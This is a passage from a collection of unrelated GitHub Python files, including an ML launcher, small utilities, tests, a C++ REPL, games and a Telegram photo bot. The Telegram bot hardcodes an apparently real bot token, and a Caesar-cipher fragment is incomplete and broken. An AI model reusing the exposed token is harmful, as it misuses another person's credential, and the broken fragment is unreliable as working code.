or the embeddings that is loaded, also used to load the corresponding data\nalign_data_test = 0 # 0 for DBP15k, 1 for WK3l-15k (only for align mode)\nmodel_type_test = 1 # 0 for TransE, 1 for RotatE (only for align mode)\n\n# this dictionary contains the basic parameters for training the model\ncustom_config = dict(\n dim=1000,\n margin=10,\n batch_size=1000,\n learning_rate=0.2,\n num_epochs=200,\n corruption_factor=5,\n filter_validation_triples=False,\n early_stopping=True,\n device=\"cuda:1\"\n)\nconfig = BASE_CONFIG.copy()\nconfig.update(custom_config)\nconfig['model'] = list(MODELS)[model_type_train]\n\nif cuda.is_available() and config['device'] != \"cpu\":\n device = torch_device(config['device'])\nelse:\n config['device'] = \"cpu\"\n device = torch_device(\"cpu\")\nprint(\"Using {}\".format(config['device']))\n\nif SEED:\n manual_seed(0) # pytorch seed\n seed(0) # numpy seed\n\nif TRAIN_MODEL:\n start = time.time()\n run_train(config=config, device=device, dataset=dataset, align_dataset=align_data_train, save_results=SAVE_RESULTS,\n align_mode=ALIGN_MODE, plot=False)\n print(\"Training took {} seconds.\".format(time.time() - start))\nelse:\n run_test(device=device, model_name=model_name, model_type=model_type_test, align_dataset=align_data_test,\n save_results=SAVE_RESULTS, align_mode=ALIGN_MODE)\n","repo_name":"jusch25/mt_kg-fusion","sub_path":"src/kg_embedding/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2220,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22599756627","text":"from gtts import gTTS\nimport os\nfrom playsound import playsound\n\n\nvoice=input(\"Enter text to speak:\\n\")\ngTTS(text=voice).save('speak.mp3')\nplaysound('speak.mp3')\nif os.path.exists('speak.mp3'):\n os.remove('speak.mp3')\nelse:\n print('File Does Not Exist')\n","repo_name":"neozvbambah/textToSpeechPy","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1033728039","text":"'''\nGiven an array of bird sightings where every element represents a bird type id, determine the id of the most frequently sighted type. 
\nIf more than 1 type has been spotted that maximum amount, return the smallest of their ids.\nExample:\narr = [1,1,2,2,3]\n'''\narr = [-1, 2, 3, 4, 4, 6, 6, -1, -1, 2]\ndi = {}\nfor x in arr:\n if x in di.keys():\n di[x]+=1\n else:\n di[x]=1\nvalues = list(di.values())\nmax_value = max(values) \nres = []\nfor key in di.keys():\n if di[key] == max_value:\n res.append(key)\nprint(min(res))\n","repo_name":"nidhisha-shetty/Python-programs","sub_path":"birds.py","file_name":"birds.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7511479315","text":"#!/usr/bin/env python\n\nimport csv\nimport datetime\n# System\nimport glob\nimport os\nfrom xlsxwriter.workbook import Workbook\n\ndef csv_to_xlsx():\n path_directory = \"./Data/PerkembanganKasus/Indonesia/\"\n\n workbook = Workbook(\"Indonesia-Covid\" + \".xlsx\")\n\n for csvfile in glob.glob( os.path.join(path_directory, \"*.csv\") ):\n province_string = csvfile[ len(path_directory) + 1 : -4 ]\n \n worksheet = workbook.add_worksheet(province_string)\n \n cell_date_format = workbook.add_format({'num_format': 'dd mmmm yyyy'})\n cell_numeric_format = workbook.add_format({'num_format': '#,##0'})\n cell_header_format = workbook.add_format({ 'bold': True, 'locked': True, 'bg_color': 'green', 'shrink': True})\n\n with open(csvfile, \"rt\", encoding=\"utf8\") as f:\n reader = csv.reader(f)\n\n for r, row in enumerate(reader):\n for c, col in enumerate(row): \n value = col\n # Header\n if r == 0: \n worksheet.write_string(r, c, value, cell_header_format)\n # Tanggal\n elif c == 0 and r != 0:\n worksheet.write_string(r, c, value, cell_date_format)\n \n else: \n new_value = int(value)\n worksheet.write_number(r, c, new_value, cell_numeric_format)\n \n workbook.worksheets_objs.sort(key=lambda x: x.name)\n workbook.close()\n\nif __name__ == \"__main__\": \n csv_to_xlsx()\n","repo_name":"jasoneliann/bangkitindonesiaku-covid19","sub_path":"csv_to_xslx.py","file_name":"csv_to_xslx.py","file_ext":"py","file_size_in_byte":1563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"44338900055","text":"import requests\n\nfrom app import app\nfrom tests.test_e2e_base import TestE2eBase, URL\n\n\nclass TestE2eDisplayCheatsheets(TestE2eBase):\n def test_empty_get(self):\n response = requests.get(URL.INDEX.value)\n self._compare_num_cheatsheets(response, 0)\n # test that where there are 0 cheatsheets,\n # we don't accidentally display the error msg\n assert app.GET_CHEATSHEETS_ERR_MSG not in response.text\n\n def test_get_one_cheatsheet(self):\n self._add_cheatsheet_to_db(\"test_snippet_1\", \"test_section_1\")\n response = requests.get(URL.INDEX.value)\n self._compare_num_cheatsheets(response, 1)\n\n def test_get_two_cheatsheet(self):\n self._add_cheatsheet_to_db(\"test_snippet_1\", \"test_section_1\")\n self._add_cheatsheet_to_db(\"test_snippet_2\", \"test_section_2\")\n response = requests.get(URL.INDEX.value)\n self._compare_num_cheatsheets(response, 2)\n\n def test_get_internal_err(self):\n # delete the db in order to get an internal error.\n self._delete_db()\n\n response = requests.get(URL.INDEX.value)\n self._compare_num_cheatsheets(response, 0, db_avail=False)\n assert response.text.count(app.GET_CHEATSHEETS_ERR_MSG) == 1\n\n def test_markdown_inline_code(self):\n \"\"\"Test that an inline code is properly highlighted.\"\"\"\n self._add_cheatsheet_to_db(\"test_`snippet`_1\", \"test_section_1\")\n 
response = requests.get(URL.INDEX.value)\n self._compare_num_cheatsheets(response, 1)\n assert \"background-color:LightGray;\" in response.text\n\n # pylint: disable=R0201 (no-self-use)\n def test_preview_section_exists(self):\n response = requests.get(URL.INDEX.value)\n assert \"Preview\" in response.text\n","repo_name":"eranfrie/CheatSheet","sub_path":"src/tests/test_e2e_display_cheatsheets.py","file_name":"test_e2e_display_cheatsheets.py","file_ext":"py","file_size_in_byte":1753,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"39409561246","text":"#!/usr/bin/env python3\nimport os\nimport readline\nimport shutil\nimport subprocess\nimport sys\nimport tempfile\n\nfrom autocompleter import AutoCompleter\nimport parser\n\ncompleter = AutoCompleter()\nreadline.set_completer(completer.complete)\nreadline.read_init_file('linereader.rc')\ndefault_dir = os.path.join(tempfile.gettempdir(), 'interc')\no_start = 0\n\nSRC = 'a.cc'\nCXX = 'clang++'\nCXXFLAGS = '-std=c++11 -O2'\nBIN = 'a.out'\n\n\nheaders = set([\n '#include ',\n '#include ',\n '#include ',\n '#include ',\n '#include ',\n '#include ',\n '#include ',\n '#include ',\n '#include ',\n '#include ',\n '#include ',\n '#include ',\n '#include ',\n '#include ',\n '#include ',\n '#include ',\n '#include ',\n '#include ',\n '#include ',\n '#include ',\n '#include ',\n '#include ',\n '#include ',\n '#include ',\n '#include ',\n '#include ',\n '#include ',\n '#include \"prettyprint.hpp\"'\n])\n\nfuncs = []\n\nmain_begin = '''\nusing namespace std;\n\nint main()\n{\n'''\n\nmain_body = []\n\nmain_close = '''\n return 0;\n}\n'''\n\n\ndef s_type(tokens):\n if not tokens:\n return '' # No code\n elif tokens[0] == '#':\n return '#INC' # #include directive\n else:\n return 'CODE' # code in main body\n\n\ndef is_brace_balance(snippet):\n c1 = sum([line.count('{') for line in snippet])\n c2 = sum([line.count('}') for line in snippet])\n return c1 == c2\n\n\ndef dump(fn, t, snippet):\n '''Dump the current source code to file `filename`.\n '''\n with open(fn, 'w') as f:\n f.write('\\n'.join(headers))\n if t == '#INC':\n f.write('\\n ')\n f.write('\\n '.join(snippet))\n f.write('\\n'.join(funcs))\n f.write(main_begin)\n f.write(' ')\n f.write('\\n '.join(main_body))\n if t == 'CODE':\n f.write('\\n ')\n f.write('\\n '.join(snippet))\n f.write(main_close)\n\n\ndef interpret(fn):\n try:\n subprocess.check_output([CXX] + CXXFLAGS.split() + ['-o', BIN, fn],\n stderr=subprocess.STDOUT)\n result = subprocess.check_output(['./' + BIN],\n stderr=subprocess.STDOUT)\n return result.decode('utf-8')\n except subprocess.CalledProcessError as e:\n # print(e.args)\n print(e.output.decode('utf-8') or e, file=sys.stderr)\n return None\n\n\ndef ic_read():\n '''Read function of REPL. Returns a code snippet.\n '''\n prompts = ('>>> ', '... ')\n imbalance = 0\n snippet = []\n while True:\n try:\n line = input(prompts[imbalance > 0])\n except (EOFError, KeyboardInterrupt):\n line = None\n\n if line is None:\n yield None\n snippet = []\n elif line.strip(): # Non-empty snippet\n snippet.append(line)\n imbalance = not is_brace_balance(snippet)\n if not imbalance:\n yield snippet\n snippet = []\n\n\ndef ic_eval(snippet):\n '''Eval function of REPL. 
Return code snippet excution output.\n '''\n global o_start\n tokens = parser.tokenize(''.join(snippet))\n t = s_type(tokens)\n if not t:\n return ''\n\n dump(SRC, t, snippet)\n output = interpret(SRC)\n if output is None:\n return None\n else:\n completer.learn(tokens)\n if t == '#INC':\n list(map(lambda x: headers.add(x.strip()), snippet))\n else:\n main_body.extend(snippet)\n i = o_start\n o_start = len(output)\n return output[i:]\n\n\ndef ic_print(output):\n if output is not None:\n print(output)\n\n\ndef main():\n reader = ic_read()\n while True:\n snippet = next(reader)\n if snippet is None:\n break\n output = ic_eval(snippet)\n ic_print(output)\n\n\nif __name__ == '__main__':\n os.makedirs(default_dir, exist_ok=True)\n shutil.copy('prettyprint.hpp', default_dir)\n os.chdir(default_dir)\n main()\n","repo_name":"Tiensbakung/interc","sub_path":"src/interc.py","file_name":"interc.py","file_ext":"py","file_size_in_byte":4254,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73610322087","text":"import numpy as np\nimport pandas as pd\nfrom easy_deco.progress_bar import ProgressBar\nfrom rackio_AI.utils.utils_core import Utils\nfrom easy_deco.del_temp_attr import set_to_methods, del_temp_attr\n\n\nclass Noise:\n \"\"\"\n Encapsulates method to work with noise\n \"\"\"\n _instances = list()\n\n def __init__(self):\n\n Noise._instances.append(self)\n\n def add(\n self, \n df: pd.DataFrame,\n win_size: int=30,\n method: str=\"rhinehardt\",\n cols: list=None,\n std_factor: float=0.001\n )-> pd.DataFrame:\n \"\"\"\n Add gaussian noise over subsequence windows based on some method\n\n **Parameters**\n\n * **:param df:** (pandas.DataFrame)\n * **:param win_size:** (int) window size to apply gaussian noise\n * **:param method:** (str) method to base gaussian noise\n * *rhinehardt* or *rh*\n * **:param cols:** (list) column names to add gaussian noise.\n\n **returns**\n\n * **df** (pandas.DataFrame) noise added\n\n ______\n ### **Snippet code\n\n ```python\n >>> import matplotlib.pyplot as plt\n >>> from rackio_AI import Noise \n >>> df = pd.DataFrame(np.random.randn(100,2), columns=[\"a\", \"b\"])\n >>> noise = Noise()\n >>> df_noisy = noise.add(df, win_size=10)\n >>> ax = plt.plot(df.index, df[\"a\"], '-r', df.index, df[\"b\"], '-b', df_noisy.index, df_noisy[\"a\"], '--r', df_noisy.index, df_noisy[\"b\"], '--b')\n >>> ax = plt.legend([\"a\", \"b\", \"noisy a\", \"noisy b\"])\n >>> plt.show()\n\n ```\n ![Add rhinehardt noise](../img/rhinehardt_noise.png)\n \"\"\"\n options = {\n 'win_size': win_size,\n 'method': method,\n 'std_factor': std_factor\n }\n self._df_ = df.copy()\n if not cols:\n\n cols = Utils.get_column_names(self._df_)\n\n self.__first_step_add(cols, **options)\n\n df = self._df_\n\n return df\n\n @ProgressBar(desc=\"Adding gaussian noise...\", unit=\"columns\")\n def __first_step_add(self, col, **kwargs):\n \"\"\"\n Decorated function to visualize the progress bar during the execution of *add noise* method\n\n **Parameters**\n\n * **:param column_name:** (list)\n\n **returns**\n\n None\n \"\"\"\n win_size = kwargs['win_size']\n windows_number = self._df_.shape[0] // win_size + 1\n windows = np.array_split(self._df_.loc[:, col], windows_number, axis=0)\n self._noise_ = list()\n\n self.__last_step_add(windows, **kwargs)\n\n self._df_.loc[:, col] = self._noise_\n\n return\n\n @ProgressBar(desc=\"Adding gaussian noise...\", unit=\"windows\")\n def __last_step_add(self, window, **kwargs):\n \"\"\"\n Decorated function to 
visualize the progress bar during the execution of *add noise* method\n\n **Parameters**\n\n * **:param column_name:** (list)\n\n **returns**\n\n None\n \"\"\"\n method = kwargs['method']\n\n if method.lower() in [\"rhinehardt\", \"rh\"]:\n std_factor = kwargs['std_factor']\n self._noise_.extend(self.rhinehardt(window, std_factor=std_factor))\n\n return\n\n def rhinehardt(self, x: pd.DataFrame, std_factor: float=1)->np.ndarray:\n \"\"\"\n Add noise to variable x based on Box-Muller transform\n\n **Parameters**\n\n * **:param x:** (pandas.DataFrame)\n \"\"\"\n x = x.values\n x = x.flatten()\n rng = np.random.RandomState(seed=42)\n r1, r2 = rng.uniform(size=len(x)), rng.uniform(size=len(x))\n xmean = np.mean(x)\n s = np.sqrt(np.sum((xmean - x)**2) / (len(x) - 1))\n\n if s <= 1:\n\n s = std_factor * xmean\n\n d = s * np.sqrt(-2 * np.log(r1)) * np.sin(2 * np.pi * r2)\n\n return x + d\n\n\nif __name__ == \"__main__\":\n import doctest\n\n doctest.testmod()\n","repo_name":"crivero7/RackioAI","sub_path":"rackio_AI/data_analysis/noise.py","file_name":"noise.py","file_ext":"py","file_size_in_byte":3891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41067827883","text":"from random import randint\n \nprint(\"==============================================\")\nprint(\"Let's play Janken!\")\nprint(\"==============================================\\n\\n\")\n\nstartGame = input(\"Shall we start?(y/n)\\n\")\nusername = input(\"Enter Your Username: \")\n\nwhile startGame == \"y\":\n\t\n #list of play options\n playList = [\"Rock\", \"Paper\", \"Scissors\"]\n \n #random play to the computer\n computer = playList[randint(0,2)]\n \n\n game = int(input(\"How many game would you play?: \"))\n\n count = 0\n\n win_score = 0\n tie_score = 0\n lose_score = 0\n \n while (count < game):\n\n computer = playList[randint(0,2)]\n\n count += 1\n\n player = input(\"\\nRock, Paper, Scissors?\\n\")\n if player == computer:\n print(\"Tie! \\n\")\n tie_score += 1\n elif player == \"Rock\":\n if computer == \"Paper\":\n print(username + \" lose!\", computer, \"covers\", player, \"\\n\")\n lose_score += 1\n else:\n print(username + \" win!\", player, \"smashes\", computer, \"\\n\")\n win_score += 1\n elif player == \"Paper\":\n if computer == \"Scissors\":\n print(username + \" lose!\", computer, \"cut\", player, \"\\n\")\n lose_score += 1\n else:\n print(username + \" win!\", player, \"covers\", computer,\"\\n\")\n win_score += 1\n elif player == \"Scissors\":\n if computer == \"Rock\":\n print(username + \" lose...\", computer, \"smashes\", player,\"\\n\")\n lose_score += 1\n else:\n print(username + \" win!\", player, \"cut\", computer, \"\\n\")\n win_score += 1\n else:\n print(\"That's not a valid play. 
Check your spelling!\\n\")\n \n print(\"\\nYour Score: \", win_score ,\" win(s) \" , tie_score ,\" tie(s) \" , lose_score ,\" lose(s)\\n\")\n\n\nif startGame == \"n\":\n print(\"Come again later\")","repo_name":"freakxelz/Rock--Paper--Scissor","sub_path":"janken.py","file_name":"janken.py","file_ext":"py","file_size_in_byte":1962,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15648196645","text":"from collections import defaultdict\n\n\ndef safe_ingredients_occurence(contains, all_ingredients):\n ingredients_with_allergens = []\n for ingredient in contains.values():\n [ingredient] = ingredient\n ingredients_with_allergens.append(ingredient)\n\n ingredients_without_allergen = [\n ingredient for ingredient in set(all_ingredients)\n if ingredient not in ingredients_with_allergens\n ]\n count = 0\n for ingredient in ingredients_without_allergen:\n count += len(\n [occurence for occurence in all_ingredients if occurence == ingredient]\n )\n return count\n\n\ndef dangerous_ingredients_list(contains):\n sorted_allergens = list(contains.keys())\n sorted_allergens.sort()\n dangerous_ingredients_list = ''\n for allergen in sorted_allergens:\n [ingredient] = contains[allergen]\n dangerous_ingredients_list += f'{ingredient},'\n return dangerous_ingredients_list[:-1]\n\n\ndef parse_ingredients_and_allergens(lines):\n contains = defaultdict(list)\n all_ingredients = []\n\n for line in lines:\n (ingredients, allergens) = line.split(' (contains ')\n ingredients = ingredients.split(' ')\n allergens = allergens[:-1].split(', ')\n\n [all_ingredients.append(ingredient) for ingredient in ingredients]\n for allergen in allergens:\n if not contains[allergen]:\n [contains[allergen].append(ingredient)\n for ingredient in ingredients]\n else:\n contains[allergen] = [ingredient for ingredient in ingredients\n if ingredient in contains[allergen]]\n if len(contains[allergen]) == 1:\n for a, i in contains.items():\n if a != allergen:\n while contains[allergen][0] in i:\n i.remove(contains[allergen][0])\n return contains, all_ingredients\n\n\nwith open('day21/input.data') as input:\n lines = [line for line in input.read().split('\\n')]\n\ncontains, all_ingredients = parse_ingredients_and_allergens(lines)\ncount = safe_ingredients_occurence(contains, all_ingredients)\nprint(f'first solution: {count}')\nprint(f'second solution: {dangerous_ingredients_list(contains)}')\n","repo_name":"DanielElisenberg/aoc2020","sub_path":"day21/day21.py","file_name":"day21.py","file_ext":"py","file_size_in_byte":2285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22710431297","text":"#! 
/usr/bin/env python3\n\nimport os\nimport requests\n\nfeedbackDir = '/data/feedback'\nfeedbackDic = {}\nurl = \"http://HOSTNAME/feedback/\"\n\ndef run():\n dirs = os.listdir(feedbackDir)\n\n for file in dirs:\n with open(os.path.join(feedbackDir, file)) as feedback:\n lines = feedback.read().splitlines()\n feedbackDic['title'] = lines[0]\n feedbackDic['name'] = lines[1]\n feedbackDic['date'] = lines[2]\n feedbackDic['feedback'] = lines[3]\n\n req = requests.post(url, data=feedbackDic)\n req.raise_for_status()\n print(str(req.ok))\n\nif __name__ == \"__main__\":\n run()","repo_name":"NullReality/python-feedback-requests-google","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38994620615","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Nov 4 18:44:22 2019\n\n@author: Joule\n\"\"\"\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom time import sleep\n\n\"\"\"Open file with training data\"\"\"\ntrain_data = pd.read_csv(\"train.csv\")\nlabels = train_data[\"label\"]\n\n\n\"\"\"Convert dataframe to list so that i can visualize with pyplotlib\"\"\"\npictures_array = []\nlabels = []\nnum_of_pic_shown = 15\nfor num_picture in range(num_of_pic_shown):\n picture = train_data.loc[num_picture].values.tolist()\n label = picture.pop(0)\n labels.append(label)\n \"\"\"make the pixel values to an 28x28 array\"\"\"\n pic_pixels = []\n pic_pixels_row = []\n for pixel_value in picture:\n pic_pixels_row.append(pixel_value)\n if len(pic_pixels_row) == 28:\n pic_pixels.append(pic_pixels_row)\n pic_pixels_row = []\n\n pictures_array.append(pic_pixels)\n\n\"\"\"Plot the drawn images\"\"\"\nfor num_of_picture in range(len(pictures_array)):\n plt.imshow(pictures_array[num_of_picture], cmap=plt.cm.binary)\n plt.show()\n print(\"This image is supposed to be\",labels[num_of_picture])\n \n\n","repo_name":"joulebit/Kaggle-Digit-Recognizer","sub_path":"digit visualization.py","file_name":"digit visualization.py","file_ext":"py","file_size_in_byte":1118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27017476374","text":"import os\nimport sys\nimport pygraphviz as pgv\n\ndef render_dot_file(dot_file, output_file):\n try:\n # Check if the input file exists\n if not os.path.isfile(dot_file):\n raise IOError(f'{dot_file} does not exist')\n\n # Read the DOT file\n g = pgv.AGraph(dot_file)\n\n # Check if the output file exists\n if os.path.isfile(output_file):\n raise IOError(f'{output_file} already exists')\n\n # Render the graph\n g.draw(output_file, format='png')\n\n except IOError as e:\n # Handle I/O errors\n print(f'Error: {e}')\n\n except pgv.error.Error as e:\n # Handle errors from pygraphviz\n print(f'Error: {e}')\n\n# Example usage\ndot_file = sys.argv[1]\noutput_file = sys.argv[2] if len(sys.argv) > 2 else None\n\n# If no output file was specified, use the same filename as the input file\n# but with a .png extension\nif not output_file:\n output_file = os.path.splitext(dot_file)[0] + '.png'\n\nrender_dot_file(dot_file, output_file)\n","repo_name":"RohitDashora/datarbricks-terraform-modules","sub_path":"scripts/rander_tf_plan/randerdot.py","file_name":"randerdot.py","file_ext":"py","file_size_in_byte":985,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"71387204329","text":"import sys\nimport os\n\nfrom curtsies.fmtfuncs import blue, red, bold, 
on_red\n\nfrom curtsies.window import FullscreenWindow\n\nimport time\n\nif __name__ == '__main__':\n\n print(blue('hey') + ' ' + red('there') + ' ' + red(bold('you')))\n n = int(sys.argv[1]) if len(sys.argv) > 1 else 100\n\n with FullscreenWindow() as window:\n rows, columns = window.get_term_hw()\n t0 = time.time()\n for i in range(n):\n a = [blue(on_red('qwertyuiop'[i%10]*columns)) for _ in range(rows)]\n window.render_to_terminal(a)\n t1 = time.time()\n t2 = time.time()\n for i in range(n):\n a = [blue(on_red('q'[i%1]*columns)) for _ in range(rows)]\n window.render_to_terminal(a)\n t3 = time.time()\n t4 = time.time()\n a = [blue(on_red('q'*columns)) for _ in range(rows)]\n arrays = []\n for i in range(n):\n a[i // columns] = a[i // columns].setitem(i % columns, 'x')\n arrays.append([fs.copy() for fs in a])\n for i in range(n):\n window.render_to_terminal(arrays[i])\n t5 = time.time()\n\n s = \"\"\" all different: %f\\tall identical: %f\\tchange on character %f\\t%d iterations\\t\"\"\" % (t1 - t0, t3 - t2, t5 - t4, n)\n os.system('echo `git log --pretty=oneline -n 1` '+s+' >> times.txt')\n print(s)\n","repo_name":"bpython/curtsies","sub_path":"examples/testcache.py","file_name":"testcache.py","file_ext":"py","file_size_in_byte":1329,"program_lang":"python","lang":"en","doc_type":"code","stars":218,"dataset":"github-code","pt":"53"} +{"seq_id":"17063806506","text":"\nnumbers=['1','2','3','4','5','6','7','8','9','0']\nsymbols=list(string.punctuation)\nalpha=list(string.ascii_lowercase)\nspace=[\" \"]\n\nalphabet=alpha+space+numbers+symbols+alpha+space+numbers+symbols\n\nprint(alphabet)\n\n\n\nwindow=Tk()\n\nwindow.title(\"CEASER CIPHER\")\nwindow.geometry(\"300x400\")\nwindow.config(padx=20,pady=20,bg=BACKGROUND_COLOR)\n\n# ------------------- FUNCTION -----------------------\n\ndef cipher(*args):\n\tglobal alphabet\n\tend_text=\"\"\n\n\tword=ent.get()\n\tshift=ent2.get()\n\n\n\tfor letter in word:\n\n\t\tpos=alphabet.index(letter)\n\n\t\tif args[0]==\"decrypt\":\n\t\t\tnew_pos=pos-shift\n\t\telse:\n\t\t\tnew_pos=pos+shift\n\n\t\tnew_letter=alphabet[new_pos]\n\n\t\tend_text+=new_letter","repo_name":"Joshua357954/100-days-of-code-challange","sub_path":"Day 8/zap.py","file_name":"zap.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73368447208","text":"import sys\nsys.path.insert(0, '../_common');\n\nimport bioinf\n\ndef main():\n f_input = open('input.txt', 'r')\n dna = f_input.read()\n f_input.close();\n rna = bioinf.transcript(dna);\n f_output = open('output.txt','w');\n f_output.write(rna);\n f_output.close();\n\nmain();","repo_name":"avejant0/RosalindInfo-Solutions-python","sub_path":"rna/source.py","file_name":"source.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"8825732614","text":"import io\n\nfrom django.apps import apps\nfrom rest_framework.test import APITestCase\n\nfrom api.applications.models import ApplicationCompanyDocument\nfrom api.applications.services.create_application_company_documents import ApplicationCompanyDocumentsService\nfrom api.applications.tests.factories import ApplicationFactory\nfrom api.companies.models import CompanyDocument\nfrom api.documents.tests.factories import DocumentFactory\nfrom api.libs.sidecar_blocks.document_store.document_api import DocumentData\nfrom api.partners.tests.factories import CompanyFactory, UserFactory, 
CompanyUserFactory, FundFactory\n\n\ndef create_document_path(contents=None):\n if not contents:\n contents = b\"The greatest document in human history\"\n config = apps.get_app_config('documents')\n upload_context = config.context\n document_api = config.document_api\n content_type = \"application/text\"\n origin_file_obj = io.BytesIO(contents)\n document_data = DocumentData(content_type, origin_file_obj)\n document_path = document_api.upload(upload_context, document_data)\n return document_path\n\n\nclass ApplicantCompanyDocumentTestCase(APITestCase):\n\n def setUp(self):\n self.company = CompanyFactory()\n self.user_1 = UserFactory()\n self.user_2 = UserFactory()\n self.company_user_1 = CompanyUserFactory(company=self.company, user=self.user_1)\n self.company_user_2 = CompanyUserFactory(company=self.company, user=self.user_2)\n self.fund = FundFactory(company=self.company)\n self.document_path = create_document_path()\n\n def test_required_once_document(self):\n document = DocumentFactory(document_path=self.document_path)\n company_document = CompanyDocument.objects.create(\n company=self.company,\n document=document,\n name='Dummy Document',\n description='Dummy Document',\n required_once=True,\n require_wet_signature=True,\n require_gp_signature=True,\n )\n\n application_1 = ApplicationFactory(company=self.company, user=self.user_1, fund=self.fund)\n application_2 = ApplicationFactory(company=self.company, user=self.user_2, fund=self.fund)\n\n ApplicationCompanyDocument.objects.create(\n application=application_1,\n company_document=company_document,\n completed=True\n )\n\n application_2_documents = ApplicationCompanyDocumentsService(\n application=application_2\n ).get_documents()\n\n self.assertEqual(application_2_documents[0]['company_document']['id'], company_document.id)\n","repo_name":"tayyabsaleem7756/jobtest","sub_path":"backend/retail_market/api/applications/tests/services/test_applicant_company_document_query.py","file_name":"test_applicant_company_document_query.py","file_ext":"py","file_size_in_byte":2613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17819287580","text":"from aiogram import Bot, types\nfrom aiogram.dispatcher import Dispatcher\nfrom aiogram.contrib.fsm_storage.memory import MemoryStorage # оперативна пам'ять\nfrom aiogram import executor\nfrom aiogram.dispatcher.filters.state import StatesGroup, State # стан\nfrom data_managment import create_table\nfrom buttons import inl_menu\nimport requests\nimport os\nimport shutil\nfrom aiogram.dispatcher import FSMContext\nfrom pydrive.auth import GoogleAuth\nfrom pydrive.drive import GoogleDrive\nimport io\nfrom photo_transfer import photo_transfer\nfrom oauth2client.service_account import ServiceAccountCredentials\n\ngauth = GoogleAuth()\nscope = [\"https://www.googleapis.com/auth/drive\"]\ngauth.credentials = ServiceAccountCredentials.from_json_keyfile_name('client_secrets.json', scope)\ndrive = GoogleDrive(gauth)\n\nprint('login saccc')\n\nBOT_TOKEN = '5675794527:AAHSjUvT1UQOxRFJYRiok4eBa4m6h3v-Fqo'\n\nbot = Bot(token=BOT_TOKEN)\ndp = Dispatcher(bot, storage=MemoryStorage())\n\ncallback_data = {}\n\nclass States(StatesGroup):\n\tphoto_send = State()\n\n\n@dp.message_handler(commands=['start'], state='*')\nasync def process_start_command(message: types.Message):\n\tawait bot.send_message(message.chat.id, 'Прогрес вашого проходження марафону:', reply_markup=inl_menu)\n\tawait bot.send_message(message.chat.id, 'Вітаю! 
Оберіть пункт котрий ви виконали ⬆')\n\n@dp.message_handler(content_types=['photo'], state=States.photo_send)\nasync def get_photo(message: types.Message, state: FSMContext):\n\n\tcreate_table(message.from_user.id)\n\n\tuser_id = message.from_user.id\n\tdata = callback_data.get(user_id, {}) # порожній словник {} за замовчуванням.\n\ttopic = data.get('topic', 'невідомо') # \"невідомо\" стоїть напевно на випадок помилки\n\n\tlocal_file_path = f'https://drive.google.com//drive//folders//maraphon//{str(user_id)}//{topic}//'\n\n\tphoto_folder = photo_transfer(user_id, topic, drive)\n\n\tphoto = message.photo[-1] # Отримайте останню фотографію з повідомлення\n\tfile_info = await bot.get_file(photo.file_id)\n\n\t# Отримайте URL-адресу файлу фотографії на сервері Telegram\n\tfile_url = file_info.file_path\n\tresponse = requests.get(f'https://api.telegram.org/file/bot{BOT_TOKEN}/{file_url}')\n\tprint(photo_folder)\n\n\tfile1 = drive.CreateFile({'title': f'{message.photo[0].file_id}' + '.png',\n\t\t\t\t\t\t\t 'parents': [{'id': photo_folder}]}) # Create GoogleDriveFile instance with title 'Hello.txt'.\n\tfile1.content = io.BytesIO(response.content) # Set content of the file from given string.\n\tfile1.Upload()\n\n\tawait bot.send_message(message.chat.id, 'фото отримав')\n\tawait state.finish()\n\n@dp.callback_query_handler(text=['wake', 'exercise', 'water', 'read', 'steps'])\nasync def callback_retarget(call: types.CallbackQuery):\n\tif call.data == 'wake':\n\t\tcallback_data[call.from_user.id] = {'topic': 'підйом'}\n\t\tawait call.message.answer('Відправте фото виконаного завдання')\n\t\tawait States.photo_send.set()\n\tif call.data == 'exercise':\n\t\tcallback_data[call.from_user.id] = {'topic': 'ранкові вправи'}\n\t\tawait call.message.answer('Відправте фото виконаного завдання')\n\t\tawait States.photo_send.set()\n\tif call.data == 'water':\n\t\tawait call.message.answer('Відправте фото виконаного завдання')\n\tif call.data == 'read':\n\t\tawait call.message.answer('Відправте фото виконаного завдання')\n\tif call.data == 'steps':\n\t\tawait call.message.answer('Відправте фото виконаного завдання')\n\n\nif __name__ == \"__main__\":\n\texecutor.start_polling(dp, skip_updates=True)","repo_name":"Vishta28/bot_send_photo","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3830,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74370366567","text":"import logging\nfrom datetime import datetime, date\n\nfrom banal import ensure_list\nfrom normality import stringify\nfrom followthemoney import model\n\nlog = logging.getLogger(__name__)\n\n\nclass TimestampSupport(object):\n 